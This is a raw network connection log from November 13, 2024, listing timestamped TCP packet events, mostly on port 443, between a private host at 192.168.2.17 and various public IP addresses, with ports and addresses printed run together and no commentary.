                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.785016060 CET44349850104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.805922985 CET49852443192.168.2.17151.101.129.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.805943012 CET44349852151.101.129.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.806277990 CET49852443192.168.2.17151.101.129.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.806447029 CET49852443192.168.2.17151.101.129.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.806459904 CET44349852151.101.129.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.812247038 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.812267065 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.812277079 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.812304020 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.812316895 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.812329054 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.812340021 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.812362909 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.812377930 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.812377930 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.812418938 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.815308094 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.815340996 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.815388918 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.815397024 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.815426111 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.815434933 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.839376926 CET4434981599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.840307951 CET4434981599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.840368986 CET49815443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.841048002 CET49815443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.841065884 CET4434981599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.845012903 CET49854443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.845021009 CET4434985499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.845087051 CET49854443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.845376015 CET49854443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.845386982 CET4434985499.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.853362083 CET4434983013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.853389025 CET4434983013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.853399038 CET4434983013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.853425026 CET4434983013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.853446960 CET4434983013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.853460073 CET49830443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.853476048 CET4434983013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.853501081 CET49830443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.853514910 CET49830443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.855633020 CET4434983013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.855654001 CET4434983013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.855695009 CET49830443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.855700970 CET4434983013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.855741978 CET49830443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.856460094 CET4434983013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.856523037 CET49830443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.856527090 CET4434983013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.856556892 CET4434983013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.856570005 CET49830443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.856600046 CET49830443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.856844902 CET49830443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.856856108 CET4434983013.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.931725025 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.931755066 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.931813002 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.931843042 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.931878090 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.931905031 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.932981014 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.933008909 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.933049917 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.933064938 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.933093071 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.933159113 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.934065104 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.934081078 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.934144020 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.934159040 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.934325933 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.979127884 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.979171991 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.979207039 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.979214907 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.979244947 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.979263067 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.979893923 CET49825443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.979907036 CET4434982513.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.983084917 CET49857443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.983131886 CET4434985713.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.983449936 CET49857443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.985411882 CET49857443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:13.985429049 CET4434985713.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.022993088 CET49859443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.023030996 CET4434985913.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.023173094 CET49859443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.023551941 CET49859443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.023567915 CET4434985913.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.175601006 CET44349838157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.175817966 CET49838443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.175842047 CET44349838157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.177727938 CET44349838157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.177798033 CET49838443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.178633928 CET4434983713.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.178945065 CET49838443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.179039955 CET44349838157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.179097891 CET49837443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.179119110 CET4434983713.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.179238081 CET49838443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.179258108 CET44349838157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.180016041 CET4434983713.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.180078030 CET49837443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.180885077 CET49837443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.180948019 CET4434983713.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.181010962 CET49837443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.220573902 CET49837443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.220588923 CET4434983713.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.220698118 CET49838443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.256104946 CET44349840157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.256453037 CET49840443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.256464958 CET44349840157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.257987022 CET44349840157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.258034945 CET49840443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.258363962 CET49840443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.258456945 CET44349840157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.258654118 CET49840443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.258661032 CET44349840157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.268564939 CET49837443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.300754070 CET49840443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.415796041 CET44349852151.101.129.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.416100025 CET49852443192.168.2.17151.101.129.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.416105986 CET44349852151.101.129.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.417187929 CET44349852151.101.129.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.417253971 CET49852443192.168.2.17151.101.129.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.418184042 CET49852443192.168.2.17151.101.129.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.418246031 CET44349852151.101.129.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.418406010 CET49852443192.168.2.17151.101.129.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.418411970 CET44349852151.101.129.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.425544977 CET49680443192.168.2.1720.189.173.13
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.456634045 CET44349850104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.456835032 CET49850443192.168.2.17104.26.5.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.456851959 CET44349850104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.458450079 CET44349850104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.458530903 CET49850443192.168.2.17104.26.5.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.460190058 CET49850443192.168.2.17104.26.5.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.460279942 CET44349850104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.460319996 CET49850443192.168.2.17104.26.5.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.472544909 CET49852443192.168.2.17151.101.129.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.484409094 CET44349848150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.484627962 CET49848443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.484646082 CET44349848150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.484992981 CET44349848150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.485064030 CET49848443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.485670090 CET44349848150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.485721111 CET49848443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.486428022 CET49848443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.486493111 CET44349848150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.486633062 CET49848443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.503323078 CET44349850104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.503787994 CET44349840157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.503880024 CET49840443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.503901958 CET44349840157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.506115913 CET49850443192.168.2.17104.26.5.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.506129980 CET44349850104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.527239084 CET44349838157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.527340889 CET44349848150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.527358055 CET44349838157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.527437925 CET49838443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.527507067 CET44349838157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.528090954 CET49838443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.528172016 CET44349838157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.528242111 CET49838443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.536586046 CET49848443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.536600113 CET44349848150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.552566051 CET49850443192.168.2.17104.26.5.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.552670956 CET49840443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.552686930 CET44349840157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.565908909 CET49862443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.565942049 CET4434986254.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.566068888 CET49862443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.566289902 CET49862443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.566301107 CET4434986254.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.584645987 CET49848443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.588398933 CET4434984713.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.588630915 CET49847443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.588646889 CET4434984713.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.588990927 CET4434984713.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.589432001 CET49847443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.589490891 CET4434984713.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.589586020 CET49847443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.600569963 CET49840443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.614409924 CET44349850104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.614558935 CET44349850104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.614650965 CET44349850104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.614710093 CET49850443192.168.2.17104.26.5.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.614742994 CET44349850104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.614789009 CET49850443192.168.2.17104.26.5.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.614799976 CET44349850104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.614947081 CET44349850104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.615000010 CET49850443192.168.2.17104.26.5.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.615009069 CET44349852151.101.129.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.615181923 CET49850443192.168.2.17104.26.5.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.615194082 CET44349850104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.615228891 CET44349852151.101.129.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.615272999 CET44349852151.101.129.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.615278006 CET49852443192.168.2.17151.101.129.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.615298033 CET44349852151.101.129.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.615345955 CET44349852151.101.129.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.615346909 CET49852443192.168.2.17151.101.129.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.615356922 CET44349852151.101.129.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.615389109 CET49852443192.168.2.17151.101.129.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.615808964 CET44349852151.101.129.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.615917921 CET44349852151.101.129.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.615947962 CET44349852151.101.129.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.615962029 CET49852443192.168.2.17151.101.129.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.615971088 CET44349852151.101.129.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.616019964 CET49852443192.168.2.17151.101.129.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.616549969 CET44349852151.101.129.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.619838953 CET49864443192.168.2.17104.26.5.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.619874001 CET44349864104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.619927883 CET49864443192.168.2.17104.26.5.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.620512962 CET49864443192.168.2.17104.26.5.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.620527983 CET44349864104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.621555090 CET49852443192.168.2.17151.101.129.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.621592045 CET44349852151.101.129.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.621639967 CET49852443192.168.2.17151.101.129.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.621774912 CET44349840157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.621788025 CET44349840157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.621809006 CET44349840157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.621819019 CET44349840157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.621845007 CET44349840157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.621850014 CET49840443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.621876955 CET44349840157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.621900082 CET49840443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.621900082 CET49840443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.623300076 CET49865443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.623317003 CET4434986599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.623614073 CET49865443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.623814106 CET49865443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.623827934 CET4434986599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.628436089 CET4434984291.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.628678083 CET49842443192.168.2.1791.228.74.166
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.628695965 CET4434984291.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.629676104 CET4434984291.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.629741907 CET49842443192.168.2.1791.228.74.166
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.631331921 CET4434984713.225.78.53192.168.2.17
